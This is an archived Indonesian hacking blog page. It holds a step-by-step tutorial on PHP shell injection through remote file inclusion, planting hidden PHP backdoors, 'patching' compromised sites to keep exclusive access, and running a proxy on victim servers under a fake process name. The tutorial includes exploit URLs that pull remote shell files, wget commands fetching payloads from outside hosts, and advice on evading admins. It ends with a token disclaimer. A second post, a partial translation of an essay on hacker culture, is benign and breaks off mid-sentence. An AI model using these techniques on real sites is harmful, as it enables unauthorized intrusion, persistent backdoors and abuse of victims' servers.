blis<=========|Gue_ni|=========>blis
| <====(( JATIMCREW )) Waktu Dimana Anak-anak Bangsa Menunjukkan Kreativitasnya-----------|
Darah_2Darah_1

Senin, 22 Februari 2010

Php shell Injection,Php Shell Backdooring,Patching

1.Php Shell Injection
- Landasan Teori

PHP Shell Injection ( Injeksi PHP ) itu afaan om?

PHP Shell Injection adalah sebuah tindakan untuk melakukan eksploitasi terhadap celah keamanan sebuah website dengan cara menginjeksi Shell hasil pengkodean bahasa PHP terhadap file yang terdapat pada website tersebut yang memiliki kelemahan ataupun kesalahan pemrograman/pengkodean. Tapi kalau orang kita biasa menyebutnya Nginjek Shell hehe… Yang saya maksud dengan PHP Shell Injection di sini adalah berbeda hal dengan PHP Injection. PHP Shell Injection yang akan saya bahas adalah tindak lanjut atau tahap eksploitasi selanjutnya dengan memanfaatkan bug PHP Injection ataupun Remote File Inclusion (RFI), yaitu pengeksploitasian sebuah target dengan media PHP Shell. Perhatikan perbedaannya :
PHP Injection, memasukan perintah-perintah shell langsung dengan menambahkan perintah PHP pada URL:

http://www.target.com/[path]/page.php?action=exit.passthru($_GET[cok]);exit&cok=wget http://xXx.co.cc/xXx/r00t


Yang bertulisan tebal itu perintah PHP-nya sedangkan yang bertulisan miring adalah perintah shellnya.


PHP Shell Injection-nya :
http://www.target.com/[path]/page.php?action=exit.include($_GET[cok]);exit&cok= [injekan??]

Remote File Inclusion (RFI), memasukan file yang berisi script PHP dari luar ke dalam target dengan memanfaatkan kesalahan statemen pengkodean PHP pada file di dalam target yang tidak terfilter dengan baik, misalnya bug ini :

require_once($bcrm_pub_root . “/public_prepend.inc.php”)
PHP Shell Injection-nya :
http://www.target.com/browser_crm/pub/clients.php?bcrm_pub_root=[injekan??]

- Saatnya Beraksi!
Setelah anda berhasil mendapatkan target berupa situs yang mempunyai kelemahan terhadap serangan RFI (Remote File Inclusion) dari proses scanning yang dilakukan oleh bot scan kamu sebelumnya, misalnya saja bot scan kamu menampilkan output seperti di bawah ini :

http://intruder.gmork.cz/forum//includes/usercp_sendpasswd.php?phpbb_root_path[user]=[evil code]

Nah dari url yang dikeluarkan oleh bot scan tersebut, kamu ambil/copy sampai ke tanda ’=’ (sama dengan) seperti pada gambar di atas (tulisan evil code-nya dibuang), lalu tambahkan di belakangnya (tanpa spasi) script PHP Shell yang mau dipakai untuk injeksi (PHP Shell Injector) dan diakhiri dengan tanda tanya ( ? ).

Lah mana PHP Shell Injector-nya??? Bagi donk!!!
Hare gene gak punya PHP Shell Injector….? hehehe

Oke kalo yang belum punya coba aja masuk ke irc server indoirc disana banyak yg scan minta aja kali dikasih, Kalau udah dapat semuanya, misalnya seperti ini :

- Target tadi:

http://intruder.gmork.cz/forum//includes/usercp_sendpasswd.php?phpbb_root_path[user]=[evil code]

- PHP Shell Injector:

http://geocities.com/gara_013/injek.txt???

Sekarang gabungkan keduanya jadi seperti ini :

http://intruder.gmork.cz/forum//includes/usercp_sendpasswd.php?phpbb_root_path[user]=http://h1.ripway.com/newbe/kambe.txt?

Jangan lupa tanda tanya dibelakangnya harus ditambahkan. Setelah itu paste-kan hasil di atas ke browser lalu jalankan. Kalo browser menampilkan hasil seperti di bawah ini atau mungkin mirip (PHP Injektor memiliki tampilan berbeda-beda), maka selamat buat kamu, kamu telah melakukan yang namanya PHP SHELL INJECTION!

Wew, yang ditampilkan di atas itu apa namanya sih?? Lalu apa gunanya?? Yang di atas itulah yang namanya shell. Shell adalah sebuah interface agar user dapat berkomunikasi dengan sistem komputer. Komunikasi yang terjadi yaitu user dapat mengetikan/menginput perintah-perintah khusus pada shell yang akan diterjemahkan pada komputer untuk dikerjakan.
Hanya saja shell seperti di atas sifatnya masih hanya remote dari luar server dan kalau celah keamanannya telah diketahui oleh adminnya dan ditutup, maka kamu nggak bisa lagi mengaksesnya.

Yahhh… ngapain juga repot-repot injek-injekan PHP segala kalo shell-nya gak tahan lama..!!!
Wew, tenang.. tenang… bisa kita akalin biar lebih awet. Segala permasalahan pasti ada pemecahannya. Pada tahap inilah kita harus melakukan apa yang orang Arab bilang PHP SHELL BACKDOORING.

2. PHP SHELL BACKDOORING (Menanam Backdoor PHP)
- Landasan Teori

Backdoor itu apa sih om?
Backdoor adalah sebuah program ataupun hasil pengkodean yang memungkinkan seseorang dapat mengakses secara remote komputer korban (tempat backdoor ditanam). Bisa disebut juga sebagai ’jalan belakang’ untuk masuk ke komputer korban tanpa harus melalui form login.
Jadi dengan backdoor, kita tidak lagi mengakses shell di target dari luar (PHP Injection) melalui vulnerability lain seperti pada awal tutorial ini. Kita akan dapat mengakses komputer korban sekalipun celah keamanan tadi pun telah ditutup oleh adminnya. Nah, dalam tutor ini backdoor yang kita gunakan adalah PHP Shell backdoor. Backdoor ini adalah PHP Shell Injector itu sendiri (gampang kan?). Kalau bisa biasakanlah memakai backdoor yang berupa PHP Shell sederhana saja, jangan yang berat dan kompleks sejenis C99 dan R57, karena sangat mudah bagi admin target untuk menemukannya. Logikanya begini, kalau orang lain (bukan admin) saja bisa menemukan dengan mudah backdoor C99 atau R57 melalui google, apalagi admin target itu sendiri kan? Dan biasakan juga menanam lebih dari satu backdoor di tempat yang berbeda-beda pada sebuah target, dengan begitu apabila satu backdoor dihapus oleh admin, masih ada backdoor lain yang belum tentu ketahuan.

- Saatnya Beraksi!

Pertama-tama kamu cari dulu directory yang mempunyai Permission 777 (Direktori yang dapat diakses/dibaca, dapat diubah/diedit, dapat dieksekusi) atau perizinan direktorinya drwx rwx rwx. (Readable, Writeable, eXecutable untuk semua group). Caranya dengan mengeksekusi perintah :

find –perm –d /777

Namun, PHP backdoor ini tidak hanya membutuhkan direktori 777, tapi juga harus direktori yang sifatnya public, artinya direktori yang dapat diakses langsung lewat browser oleh semua orang. Ciri-ciri dari direktori ini yaitu pada path direktorinya ada tulisan seperti www, httdoc, httpd, html, public_html atau lain sebagainya. (Kalau emang public, dapat dites nantinya saat backdoor sudah terpasang). Coba liat hasil setelah menjalankan perintah di atas :
Setelah mendapatkan direktori tersebut misalnya salah satu direktori 777 yaitu /var/www/intruder/forum/db seperti di atas, langsung aja masuk/pindah ke direktori tersebut dengan mengeksekusi perintah ini :
cd /var/www/intruder/forum/db atau secara manual ketik aja di line direktori
Kalau sudah, sekarang tinggal mendownload/transfer file backdoor (PHP Injector tadi) ke dalam target. Caranya seperti biasa menggunakan wget atau lwp-download seperti ini :
wget http://h1.ripway/newbe/kambe.txt kalo gak bisa coba lwp-download
Jika perintah itu sukses, maka lanjutkan dengan mengubah file PHP Shell tersebut, dalam hal ini kambe.txt menjadi file berekstensi PHP dengan perintah ini :

mv kambe.txt.txt .system.php

Perintah tersebut akan mengubah file kambe.txt menjadi file hidden backdoor .system.php, dan seperti yang dijelaskan sebelumnya bahwa tanda titik di depan nama file tersebut menandakan/membuat file tersebut menjadi hidden. Dan sengaja diberinama .system.php biar gak terlalu mencurigakan. Kamu bisa lebih kreatif dengan membuat nama lain yang mirip dengan file-file yang ada di dalam direktori tersebut, jangan sampai terlihat perbedaan yang mencolok antara nama backdoor kamu dengan nama file-file lain di dalam target (Ninja Style).

Kalau semua sudah dilakukan tanpa error seperti langkah-langkah di atas, maka selamat, kamu telah melakukan Backdooring!
Horeee… tapi gimana mengakses backdoor tadi om???

Teewwwww….
Oh iya… caranya adalah dengan mengakses alamat file backdoor tadi lewat browser .
Tapi alamat file backdoornya apa om???
Nah, alamat file backdoor tadi dapat diliat dengan cara :

- Liat direktori 777 tempat kamu menyimpan backdoor tadi :

/var/www/intruder/forum/db

- Nah itu artinya alamat (URL) backdoor tersebut adalah :

http://intruder.gmork.cz/forum//db/.system.php

Mengapa di antara forum dan db garis miringnya double sedangkan pada direktori yang ada pada shell hanya 1 garis miring saja? Untuk menentukannya dapat dilihat dari URL PHP Injection tadi yang menyatakan setelah direktori forum akan diikuti garis miring double untuk mengakses direktori di bawahnya. Coba perhatikan lagi :

http://intruder.gmork.cz/forum//includes/usercp_sendpasswd.php?phpbb_root_path[user]=http://h1.ripway.com/newbe/kambe.txt?

Benar kan.. dua garis miring kan setelah forum. (Belajarlah mempertajam ketelitian dan analisa kamu)

Sekarang tinggal kamu tes aja mengkases backdoor tersebut dari browser. Kalo hasilnya mengeluarkan tampilan shell seperti atau mirip gambar di bawah ini (masing-masing PHP backdoor berbeda-beda tampilan sama halnya dengan perbedaan PHP Injector), berarti semua berjalan dengan lancar :

PHP Injection sudah. Backdooring sudah (Jangan lupa simpan URL backdoor kamu tadi). Sekarang kamu nggak perlu ngemis-ngemis lagi minta shell dari orang lain kayak tutor yang pertama karena kamu udah bisa memproduksi shell kamu sendiri.

3. PATCHING
- Landasan Teori

Patching itu afaan om?
Patching adalah suatu kegiatan untuk menutup celah keamanan (Vulnerability) dari sebuah website sehingga tidak bisa dieksploitasi lagi oleh siapa pun melaluinya.
Ada hikmah kebaikan dan keburukan dari proses patching yang akan kamu lakukan ini, yaitu :

1. Kebaikan : Kamu telah berhati mulia (weleh-weleh…) dengan menutup celah keamanan (kelemahan) sebuah website orang lain.

2. Keburukan : Kamu egois karena hanya ingin menguasai target sendiri saja. Yang lain jadi pada gak bisa masuk lagi deh lewat tuh celah keamanan. Hehehe…
Mari diambil hikmahnya….. yuuu…

- Saatnya Beraksi!

Patching yang kita lakukan terhadap RFI (Remote File Inclusion) Vulnerability ini akan lebih mudah jika dilakukan dengan PHP Shell Injector sejenis C99 yang mempunyai fitur untuk memanipulasi (editing) source file.
Syarat utama melakukan Patching ini yaitu celah keamanan harus berada pada direktori dengan permission 777 (Kecuali kalau kamu punya akses root, kamu bisa melakukan patching di direktori mana pun)
Ada tiga cara yang mungkin bisa kita lakukan untuk patching sebuah RFI Vulnerability, yaitu :

1. Memodifikasi file yang merupakan bug RFI

Coba kamu lakukan lagi PHP Injection dengan menggunakan PHP Shell Injector C99, misalnya seperti di bawah ini :

http://intruder.gmork.cz/forum//includes/usercp_sendpasswd.php?phpbb_root_path[user]=http://h1.ripway.com/newbe/kambe99.txt?

Coba perhatikan gambar hasil PHP Shell Injection tersebut :

Nah, di situ akan terlihat perbedaan warna file yang merupakan bug RFI dari target yaitu warna kuning. Atau bisa dilihat dari url PHP Injection di atas tadi. Bug-nya adalah nama file paling belakang dan sebelum tanda tanya, yaitu file usercp_sendpasswd.php. Sekarang anda tinggal klik tulisan edit di ujung yang sebaris dengan file tersebut pada shell c99 (lihat gambar di atas) yang akan menampilkan isi atau source dari file tersebut, seperti ini :

Setelah itu carilah bagian yang serupa dengan tulisan di atas yang bertuliskan include($phpbb_root_path["user"], karena memang bagian ini lah yang bermasalah (bug RFI-nya) sehingga memungkinkan seorang attacker masuk melaluinya (liat lagi URL PHP Injection tadi). Kemudian lanjutkan dengan mengubah tulisan user di atas dengan nama lain misalnya menjadi seperti ini : include($phpbb_root_path["newbee"]. Setelah itu klik save untuk menyimpannya.
Sekarang coba tes melakukan PHP Injection lagi terhadap target seperti pada awal. Hasilnya mungkin akan seperti ini :

Itu berarti celah keamanan tadi telah berhasil dipatch! Pesan error yang muncul tidak mesti selalu sama seperti di atas, dapat juga berbeda-beda tergantung target dan celah keamanannya, bisa saja memunculkan pesan Fatal Error atau lainnya.

2. Ubah nama file tersebut

Cara kedua ini adalah cara yang paling mudah yaitu dengan mengubah nama file bug tersebut di atas dengan nama lain. Sebelum mengubah nama, ganti dulu permission file tersebut menjadi 777 agar bisa melakukan manipulasi terhadapnya, caranya:

chmod 777 usercp_sendpasswd.php

Setelah itu baru ubah nama file tersebut, misalnya dengan perintah ini :

mv usercp_sendpasswd.php newbee.php

Maka file bug tersebut akan berubah nama menjadi newbee.php sehingga URL PHP Injection hasil scan di atas tadi menjadi tidak valid lagi (berubah).

3. Hapus file tersebut

Cara ketiga ini juga mudah sekali sama halnya dengan cara kedua yaitu tinggal hapus aja file yang jadi bug RFI-nya. Beres kan? Gak ada lagi file yang bisa diinjeksi kalau file itu sendiri sudah tidak ada. Caranya seperti di atas, ubah dulu permission filenya menjadi 777 lalu tinggal eksekusi aja perintah ini : rm usercp_sendpasswd.php
Coba aja kamu tes lagi melakukan PHP Injection dari awal setelah kamu memakai cara kedua atau cara ketiga. Pasti hasilnya akan seperti atau mirp di bawah ini :

Itu berarti celah keamanan tadi telah ditutup, dan ingat! Jika kamu tidak memiliki akses root, maka kamu HANYA bisa melakukan patching seperti di atas apabila dalam kondisi file bug tersebut berada di direktori 777.
Sector Clear! Patching udah. Lalu gimana donk kita masuk lagi ke shell target kalau PHP Injection gak bisa lagi???
Lah, kan tadi kamu uda pasang backdoor. Masuk aja lewat situ… hehehe.. mulai paham kan algoritmanya? Gampang kan?
Tapi ada cara lain lagi untuk memasuki target tanpa menggunakan backdoor, yaitu dengan menggunakan PHP Shell Injection lagi, namun hanya bisa dilakukan jika kamu menggunakan cara pertama atau kedua saja :

1. Jika kamu melakukan patching dengan cara pertama, maka kamu bisa masuk ke target dengan PHP Injection ini :

http://intruder.gmork.cz/forum//includes/usercp_sendpasswd.php?phpbb_root_path[newbee]=http://h1.ripway.com/newbe/kambe99.txt?

Lihat tulisan yang miring di atas, itu karena kamu telah mengubah tulisan user menjadi newbee pada cara pertama. (dan hanya kamu yang mengetahui path tersebut).

2. Jika kamu melakukan patching dengan cara kedua, maka kamu bisa masuk ke target dengan PHP Injection ini :

http://intruder.gmork.cz/forum//includes/newbee.php?phpbb_root_path[user]=http://h1.ripway.com/newbe/kambe99.txt?

Lihat tulisan miring di atas, itu terjadi karena kamu mengubah file usercp_sendpasswd.php menjadi newbee.php pada cara patching kedua.

Patching yang baik sebenarnya bukanlah dengan cara-cara di atas, tapi seorang admin harus membuat code program tambahan untuk memfilter suatu statemen inlcude seperti di atas misalnya saja dengan statemen switch, for, ataupun case agar file tersebut dapat berfungsi dengan seharusnya.

Sekarang minum lagi kopi susunya tadi, ntar keburu dingin loh. Nyante aja udah, kamu dah punya backdoor di sebuah website. Lalu ngapain lagi ya? Deface? Kayaknya gak perlu deh, kalau kamu deface tuh website sama aja ibaratnya kamu kirim surat ke rumah orang yang kamu susupi dan mengatakan ”Hey om! Aku dah pasang pintu rahasia di rumah kamu, jadi aku sekarang bebas berkeliaran di rumah kamu sekalipun kamu kunci semua pintu lainnya!!!”. Si admin tuh website yang tahu keberadaan kamu pasti menggunakan berbagai macam cara untuk mendeteksi backdoor yang kamu pasang tadi, ini tentu aja akan menambah peluang dalam memperpendek umur backdoor kamu yang amat sangat berguna itu.
Daripada melakukakan hal-hal seperti di atas, kamu bisa aja memanfaatkan website tersebut untuk hal-hal menarik lainnya, misalnya aja membuat website itu sebagai proxy server pribadi kamu.

4. CREATE PROXY
- Landasan Teori

Proxy itu apa om? Sejenis makanan ringan itu ya?
Bukan kaleee. Proxy itu adalah sebuah aplikasi yang menjadi media perantara antara kamu (sebagai client) dan ISP sebagai penyedia jasa internet. Sehingga IP address yang kamu pakai atau yang terkoneksi dengan website saat berinternet adalah ip address dari server proxy tersebut. Yang kamu perlu konfigurasikan hanyalah mengatur nama server proxy dan port-nya saja pada browser.

- Saatnya Bereaksi! Eh.. Beraksi!

1. Buka backdoor kamu tadi.
2. Transfer file kompresan proxy.tgz ke dalam target dengan perintah:

wget http://www.mith.com/db/osr/proxy.tgz

3. Dekompresi (extract) file tersebut :

tar -zxvf proxy.tgz

Hasilnya dekompresi tersebut berupa sebuah folder bernama pro

4. Masuk ke direktori tempat hasil dekompresi yaitu direktori pro tadi :

cd /var/www/intruder/forum/db/pro atau bisa kamu lakukan secara manual saja.
Isi dari folder pro tersebut adalah file xh dan prox

5. Atur port dan jalankan :

./xh -s “/usr/sbin/httpd” –d ./prox -a -d –p1234

Maksud perintah di atas adalah mengeksekusi file xh untuk membuat proses dengan nama palsu (fake process) yaitu /usr/sbin/httpd dan menjalankannya sebagai daemon/system (-d) atau berjalan di background untuk program proxy kamu tadi (prox) yang berjalan pada port 1234.
Yang perlu diingat cuman portnya itu kamu set 1234, terserah kalau kamu mau kasih port lain.

Kalau tidak ada pesan error, berarti semua berjalan lancar. Kalau kamu memakai proxy tersebut, tinggal masukan IP dan PORT proxy tersebut ke dalam settingan browser misalnya Mozilla seperti gambar di bawah ini :

IP proxy di atas adalah IP dari website target tadi. Bisa kamu cek di http://who.is
Setelah sudah disetting, baru cek lagi di http://who.is apakah berfungsi atau tidak. Dan lihat IP kamu di sana apakah sudah berubah mengikuti IP proxy tersebut.

Selamat… Proxy kamu aktif. Kalau tidak berhasil bisa saja terjadi karena ISP (Penyedia Layanan Internet) kamu tidak mengizinkan adanya akses yang menggunakan proxy melalui server mereka.

—————————— Potong di sini ————————————-

Selesai juga akhirnya… Piuuwwhh….
Tapi lega juga…ho ho ho

/* Tutorial ini hanya sekedar untuk edukasi dan pengetahuan tentang security khususnya cara melakukan penetration test terhadap website sendiri lalu melakukan patching sederhana dan cepat. Segala kerusakan atau kerugian yang terjadi karena penyalahgunaan tutorial ini adalah bukan tanggung jawab saya. */

{

Maaf kalau tutorialnya masih berkualitas newbie dan masih ada salah di sana sini, namun kembali lagi mengutip dan memodifikasi kalimat dari om n0c0py (kemungkinan gay) :
”Lebih baik mempunyai sedikit ilmu tapi mau berbagi dengan yang lain daripada mempunyai banyak ilmu tapi hanya berdiam diri dan menyimpan untuk diri sendiri saja.”

ReadMore

Minggu, 21 Februari 2010

Cara Menjadi Seorang Hacker

Mengapa Dokumen Ini?Sebagai seorang editor dari Jargon File, seringkali saya mendapatkan email permohonan dari kalangan newbie yang antusias menanyakan (seperti) “Bagaimana saya bisa belajar menjadi seorang hacker yang handal?” Cukup aneh juga, karena mereka tidak melihat dan membaca berbagai FAQ atau dokumentasi web yang mengulas pertanyaan penting ini, jadi inilah masalah utamanya.Jika anda membaca cuplikan dokumen offline ini, versi onlinenya ada di http://www.ccil.org/~esr/faqs/hacker-howto.htmlApakah Hacker itu?Jargon File yang berisikan penjelasan istilah hacker yang terkait erat dengan keahlian teknis dan senang memecahkan masalah serta melampaui batasan yang ada.


Jika anda ingin tahu cara menjadi seorang hacker, hanya ada dua hal yang benar-benar relevan.Ada sebuah komunitas, budaya saling berbagi informasi, dari kaum programmer ahli dan pakar jaringan yang melalui sejarah saat pertama kali minicomputer diciptakan dan awal mula eksperimen ARPAnet. Para anggota budaya ini asal sebenarnya istilah ’hacker’. Hacker yang membangun internet, hacker menciptakan sistem operasi UNIX hingga hari ini. Hacker pula yang menjadikan World Wide Web bekerja. Jika anda merupakan bagian dari budaya ini, jika anda berkontribusi didalamnya dan mereka mengenal anda serta menyebut anda seorang hacker, maka anda memang benar seorang hacker.Pola pikir hacker tidak terbatas pada budaha software-hacker. Ada beberapa orang yang menerapkan sikap hacker tersebut pada hal lainnya, seperti elektronik atau musik – sebenarnya, disini anda dapat menemukan tingkat tertinggi dari ilmu pengetahuan atau seni. Sedangkan software hacker mengenal semangat juang ini dimanapun mereka berada dan menyebut diri mereka “hacker” juga – dan beberapa klaim bahwa dunia hacker tidak terbatas pada dimana mereka bekerja. Namun dalam dokumen ini kita hanya berfokus pada keahlian dan sikap para software hacker, dan tradisi saling berbagi yang mengawali istilah ‘hacker’.Adapula kelompok lain yang menyebut diri mereka hacker, namun sebenarnya tidak. Orang-orang ini (terutama dikalangan remaja) lyang melakukan kerusakan komputer dan membobol sistem telepon.
Para hacker yang sejati menyebut mereka sebagai ‘cracker’ dan tidak ada kaitannya dengan mereka. Hacker sejati menganggap cracker adalah pemalas, tidak bertanggung jawab dan pandai, dan kemampuan yang mereka miliki hanya untuk membobol sistem keamanan tidak lantas menjadi mereka hacker sebagaimana halnya jika anda mampu menjalankan mobil juga tidak lantas menjadikan anda seorang insinyur otomotif. Sayangnya, banyak sekali para jurnalis dan penulis yang salah dalam menggunakan kata ‘hacker’ untuk menggambarkan cracker; hal ini menodai citra hacker sejati.Perbedaan dasar antar hacker dan cracker: hacker membangun sesuatu, crackerlah yang merusaknya.Jika anda ingin menjadi seorang hacker, banyaklah membaca. Jika anda ingin menjadi seorang hacker, bacalah alt.2600 newsgroup dan bersiap-siaplah untuk melakukan 5 dari 10 perbuatan tercela setelah menyadari bahwa anda tidaklah secerdas yang anda kira. Dan itulah mengapa saya menggolongkan anda sebagai cracker.Sikap HackerHacker memecahkan masalah dan membangun sesuatu, dan mereka meyakini kebebasan dan saling membantu satu sama lainnya dengan sukarela.
Untuk diterima sebagai seorang hacker, anda harus berperilakuk seolah-olah hal itu merupakan sikap anda sendiri. Dan untuk berperilaku seakan-akan anda memiliki sikap tersebut, terlebih dahulu anda harus meyakini kebenaran sikap tersebut.Tapi jika anda mengira menerapkan sikap hacker merupakan suatu cara untuk diterima dalam budaya hacker tersebut, anda salah besar. Menjadi orang yang memiliki sikap hacker sangatlah penting bagi anda – untuk membantu anda belajar dan terus termotivasi. Sebagaimana halnya seni penciptaan, cara paling efektif untuk menjadi seorang master adalah berpikir dan bertindak bahwa anda benar-benar seorang master – tidak hanya secara intelektual namun juga secara emosional.Jadi, jika anda ingin menjadi seorang hacker, teruslah mengulang-ulang hal tersebut hingga anda benar-benar menjadi salah satu diantara mereka.1. Dunia yang penuh pesona masalah telah menunggu untuk diatasi.Menjadi seorang hacker sangatlah menyenangkan, namun jenis kesenangan yang diperoleh membutuhkan banyak usaha. Usaha yang memerlukan motivasi. Kesuksesan seorang atlet memerlukan motivasi akan bentuk fisik yang bagus, yang mendorong mereka mengatasi keterbatasan fisik mereka.Sama halnya, untuk menjadi seorang hacker anda perlu keterampilan dasar dalam memecahkan masalah, mempertajam kemampuan dan melatih kecerdasan anda tanpa henti.Jika anda jenis orang yang seperti itu secara alami, anda perlu memiliki tujuan untuk menjadi seorang hacker. Dengan kata lain anda memerlukan semangat hacking yang tidak dirusak dengan mengumbar nafsu seks, uang dan cemoohan masyarakat.(anda juga harus mengembangkan ketekunan dalam belajar – mempercaya bahwa meskipun anda tidak mengetahui semua yang anda perlukan dalam memecahkan masalah, jika anda hanya mampu mengungkap sebagian dan belajar dari hal itu, anda telah cukup belajar mengatasi masalah dibagian berikutnya – dan seterusnya, hingga anda benar-benar berhasil.)2. Tak seorangpun harus mengatasi masalah dua kaliPemikiran kreatif sangatlah berharga, sumber dayanya terbatas.
Tidak seharusnya mereka memboroskan waktu dengan masalah yang sama berulang-ulang disaat berbagai masalah baru telah menunggu diluar sana.Untuk berperilaku seperti seorang hacker, anda harus yakin bahwa waktu berpkir hacker lain sangatlah jitu – jadi nyaris merupakan tugas moral bagi anda untuk berbagi informasi, memecahkan masalah dan memberikan solusi lebih jauh agar hacker lainnya dapat mengatasi masalah yang baru ketimbang menghabiskan waktu pada masalah yang sama berulang-ulang.(Anda tidak perlu percaya bahwa anda harus memberikan seluruh produk kreatif anda, meski para hacker ada pula yang melakukannya untuk memperoleh respek dari hacker lainnya. Konsistensi nilai-nilai hacker untuk menjual produknya hanyalah sekedar untuk makan dan biaya sewa komputer. Konsistensi dalam menggunakan keahlian hacking anda untuk mendukung keluarga atau memperoleh kekayaan, tidak apa-apa sepanjang anda tidak lupa bahwa anda adalah seorang hacker.)3. Bosan dan kejenuhan adalah musuh utama.Kaum hakcer (dan orang-orang kreatif pada umumnya), semestinya tidak pernah menjadi bosan atau jenuh terhadap pekerjaan rutin, karena saat hal ini terjadi maksdunya mereka tidak melakukan apa yang mereka mampu lakukan – memecahkan masalah baru. Hal ini hanya akan menyakit perasaan setiap orang. Oleh karena itu bosan dan kejenuhan bukan hanya tidak diinginkan melainkan juga musuh utama.Untuk berperilakuk sebagai seorang hacker, anda harus percaya hal ini cukup untuk berada sejauh mungkin dari kebosanan, tidak hanya untuk diri anda sendiri namun juga bagi orang lain (khususnya hacker lainnya).(Terdapat beberapa pengecualian untuk hal ini.
Para hacker terkadang melakukan sesuatu yang tampaknya berulang-ulang atau membosankan untuk memperhatikan dan melatih kejernihan pikirannya, bertujuan untuk mempertajam kemampuan atau mendapatkan beberapa pengalaman tertentu yang tidak dimiliki oleh orang lain. Namun dengan pilihan ini – tak seorang pun bisa memperkirakan kapan mereka terperosok dalam kejenuhan.)4. Kebebasan adalah hal yang baik.Kaum hacker pada dasarnya anti-penguasa. Setiap orang yang mencekoki anda denga pemikiran ala penguasa, pada umumnya memiliki beberapa alasan tertentu untuk melakukannya pula. Jadi sikap sok berkuasa harus dilawan dimanapun anda berada, untuk mengurangi jeratan yang melilit anda dan para hacker lainnya.(Hal ini tidak berarti melawan seluruh penguasa.
Anak-anak perlu dididik dan kejahatan harus dicegah. Seorang hacker bisa menerima beberapa jenis kekuasaan yang bertujuan sama dengan yang dia inginkan daripada menghabiskan waktunya dengan menuruti tujuan lainnya. Namun adakalanya perlu dilakukan tawar-menawar, jenis penyerahan diri pada kekuasaan tidak akan pernah mereka berikan.)Para penguasa identik dengan penyensoran dan kerahasiaan. Mereka tidak pernah mempercayai ketulusan kerja sama dan berbagi informasi – mereka hanya menyukai ‘kerja sama’ yang dapat mereka kendalikan. Jadi untuk berperilaku sebagai seorang hacker, anda harus mengembangkan suatu kebencian terhadap penyensoran, kerahasiaan, dan penggunaan kekerasan atau tipu daya guna menghindari tanggung jawab. Dan anda harus bersedia bertindak berdasarkan keyakinan tersebut.5. Sikap tidak menggantikan keahlian.Untuk menjadi seorang hacker, anda harus mengembangkan beberapa sikap ini. Tapi membatasi diri pada sebuah sikap tunggal tidak akan menjadikan anda seorang hacker, atau apapun yang menjadikan anda sebagai seorang atlet juara atau bintang tenar.
Menjadi seorang ahcker memerlukan kecerdasan, latihan, dedikasi dan kerja keras.Oleh karena itu, anda harus belajar mempercayai sikap dan menghormati keahlian setiap orang. Kaum hacker tidak akan membiarkan pecundang membuang-buang waktu mereka, namun mereka menghormati keahlian – terutama keahlian hacking, keahlian apapun adalah baik. Keahlian membutuhkan keterampilan yang hanya beberapa master yang mampu, dan keahlian membutuhkan kecakapan yang terkait dengan sikap mental dan penjiwaan yang terbaik.Jika anda menyukai keahlian, anda akan suka mengembangkan diri anda sendiri – kerja keras dan dedikasi menjadi suatu permainan yang menarik daripada membosankan. Dan itu merupakan hal terpenting guna menjadi seorang hacker.Keahlian Dasar HackingSikap hacker sangatlah penting, tetapi keahlian jauh lebih penting.
Sikap tidak untuk mengganti keahlian, ada beberapa tolok ukur keterampilan dasar tertentu yang harus anda miliki sebelum anda bermimpi menjadi seorang hacker.Tolok ukur ini senantiasa berubah seiring dengan perkembangan teknologi yang membutuhkan keterampilan baru yang membuat usang keterampilan lam. Sebagai contoh, dulu pemrograman bahasa mesin sangat diperlukan tanpa perlu mempelajar sesuatu yang berhubungan dengan HTML. Namun di kahir 1996 sangatlah penting untuk menyertakan keahlian dalam bidang berikut ini:1. Belajar cara memprogram.Tentu saja, ini merupakan keahlian dasar hacking. Tahun 1997 anda harus mutlak menguasai bahasa C (bukan hanya sekedar coba-coba belajar). Anda bukanlah seorang hacker atau programmer jika anda hanya mengetahui satu bahasa – anda perlu belajar cara berpikir mengenai masalah pemrograman secara umum, tidak tergantung pada satu bahasa pemrograman saja. Untuk menjadi seorang hacker sejati, anda harus mendapatkan petunjuk dimana anda dapat mempelajari bahasa baru selama berhari-hari dengan menghubungkan petunjuk terhadap apa yang telah anda ketahui. Maksudnya anda harus mempelajari beberapa bahasa pemrograman yang berbeda.Disamping C, anda harus mempelakari LISP dan Perl (kalau perlu Java). Disamping pentingnya bahasa pemrograman, yang setiap bahasa tersebut memiliki pendekatan berbeda, dan memberikan anda pelajaran yang sangat berharga.Saya tidak dapat memberikan petunjuk lengkap cara belajar pemrograman itu disini – membutuhkan keahlian yang kompleks.
Namun saya bisa memberitahukan anda bahwa buku dan kursus tidak akan melakukan segalanya (mungkin kebanyakan karena pemikiran terbaik oleh para hacker). Apa yang perlu dilakukan adalah (a) membaca code dan (b) menulis code.Belajar memprogram seperti belajar bahasa menulis bahasa asli. Cara terbaik untuk melakukan hal tersebut adalah membaca materi yang ditulis oleh para master dibidang masing-masing, menuliskan beberapa hal tentang diri anda, membaca lebih banyak, menulis lebih sedikit, membaca lebih banyak lagi, menulis lebih banyak… dan terus diulang-ulang hingga anda mulai menulis untuk mengembangkan dan mempertajam kemampuan sesuai dengan yang anda inginkan.Dahulu, menemukan code yang bagus untuk dibaca sangatlah sulit, karena beberapa program besar hanya menyediakan sumbernya untuk para calon hacker yang membaca dan bekerja dengannya. Kini semuanya telah berubah secara dramatis antara lain; software gratis, tool pemrograman gratis, dan sistem operasi gratis (semuanya menyediakan kode sumber, dan seluruhnya dibangun oleh kaum hacker) serta digunakan secara luas.2. Memperoleh, mempelajari, dan menjalankan UNIX secara gratis.
Saya beranggapan anda telah memiliki personal computer atau dapat mengaksesnya ditempat lain. Langkah pertama yang terpenting bagi para newbie guna mendapatkan keahlian hacker adalah mendapatkan copy Linux atau salah satunya yakni free BSD-Unix, install pada komputer anda dan jalankan.Ya, ada beberapa sistem operasi lainnya selain Unix. Namun mereka terdistribusi dalam biner (terkompilasi) – anda tidak dapat membaca code tersebut, dan anda tidak dapat memodifikasinya. Mencoba belajar menghack melalui DOS atau Windows atau MacOS seperti sama halnya belajar menari dengan tubuh terikat.Selain Unix sebagai sistem operasi di Internet. Anda bisa saja belajar menggunakan Internet tanpa perlu mengenal Unix, tetapi anda tidak dapat menjadi seorang hacker internet tanpa memahaminya. Untuk alasan inilah, budaya hacker saat ini sangat berfokus pada Unix. (Hal ini tidaklah selalu benar, karena beberapa hacker generasi lama tidak menyukainya, namun simbiosis antara Unix dan Internet menjadi cukup kuat yang bahkan Microsoft tidak mampu menggoyahkannya.)Jadi, pelajarilah Unix – saya sendiri menyukai Linux namun ada cara lainnya. Mempelajarinya. Menjalankannya. Bekerja dengannya. Menghubungkannya ke internet. Membaca kode-nya. Dan memodifikasi kodenya. Anda akan mendapatkan alat pemrograman yang lebih baik (termasuk 